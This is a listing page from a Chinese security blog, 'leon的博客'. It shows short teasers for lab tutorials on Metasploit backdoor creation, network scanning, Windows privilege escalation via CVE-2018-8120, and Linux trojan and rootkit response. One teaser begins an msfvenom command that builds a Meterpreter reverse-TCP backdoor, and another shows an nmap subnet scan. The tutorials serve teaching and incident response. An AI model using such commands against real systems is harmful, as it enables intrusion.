龙年吉祥|leon的博客
最新发布第2页
Metasploit后门渗透(三)|leon的博客

Metasploit后门渗透(三)

1.1 后门制作 1.1.1 使用编码器生成后门 1.1.1.1 使用一个编码器生成后门 [cce lang='bash']# msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.10.180 L...
Metasploit信息收集(二)|leon的博客

Metasploit信息收集(二)

1.1 Metasploit信息收集 1.1.1 基于TCP协议收集主机信息 1.1.1.1 使用metasploit中的nmap服务扫描 [cce lang='bash']msf6 > db_nmap -A -T4 -v 192.168.10.0/24[/cce] 1.1.1.2 使用arp_sweep...
Metasploit介绍及基本使用(一)|leon的博客

Metasploit介绍及基本使用(一)

1.1 Metasploit框架介绍 1.1.1 框架体系 1.1.2 架构简介 1、基础库: metasploit基础库文件位于源码根目录路径下的libraries目录中,包括Rex,framework-core和framework-base三部分: Rex是整个...
渗透提权-Tripwire检查系统完整性(二)|leon的博客

渗透提权-Tripwire检查系统完整性(二)

1.1 实验环境 序号 主机IP 主机系统 主机角色 1 192.168.10.180 Kali 攻击机 2 192.168.205.132 Centos 7.0 64位 被攻击机 1.2 Tripwire介绍 Tripwire是目前最为著名的unix下文件系统完整性检查...
Leon的博客的头像|leon的博客Leon的博客2年前
1060
渗透提权-系统提权(一)|leon的博客

渗透提权-系统提权(一)

第1章 实战:Win7系统提权 1.1 实验环境 序号 主机IP 主机系统 主机角色 1 192.168.10.180 Kali 攻击机 2 192.168.10.157 Win7 32位 被攻击机 1.2 使用CVE-2018-8120漏洞进行提权 1.2.1 下载提...
Linux木马-应急响应(六)|leon的博客

Linux木马-应急响应(六)

1.1 溯源 1.1.1 查看当前登录的用户 w是一个命令行工具,它可以展示当前登录用户信息,并且每个用户正在做什么,它同时展示以下信息:系统已经运行多长时间、当前时间和系统负载。 [cce lang='b...
Leon的博客的头像|leon的博客Leon的博客2年前
1290
Linux木马-Linux中毒处理总结(五)|leon的博客

Linux木马-Linux中毒处理总结(五)

1.1 木马运行原理 生成是木马病原体 通过脚本每隔1分钟自动检测一次,如果木马程序不存在就从病原体复制一份到某个目录,然后执行副本木马,生成一个随机命名的程序,把副本放到系统定时任务计...
Leon的博客的头像|leon的博客Leon的博客2年前
1520
Linux木马-后门排查(四)|leon的博客

Linux木马-后门排查(四)

1.1 GScan介绍 GScan是一款为安全应急响应提供便利的工具,自动化监测系统中常见位置,工具运行环境:CentOS (6、7) + python (2.x、3.x)。 工具会自动分析系统日志以及系统中账户配置存在哪些...
Leon的博客的头像|leon的博客Leon的博客2年前
1940
Linux木马-Rootkit隐藏木马(三)|leon的博客

Linux木马-Rootkit隐藏木马(三)

1.1 Rootkit介绍 Rootkit 是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。 1.2 ...
Leon的博客的头像|leon的博客Leon的博客2年前
2410
Linux木马-木马父进程实时监控木马(二)|leon的博客

Linux木马-木马父进程实时监控木马(二)

1.1 实验环境 序号 主机IP 主机系统 主机角色 1 192.168.10.180 Kali 攻击机 2 192.168.10.80 Centos 7.9 64位 被攻击机 1.2 生成木马父进程 1.2.1 木马父进程作用 生成木马的父进程,自动检测...
Leon的博客的头像|leon的博客Leon的博客2年前
1010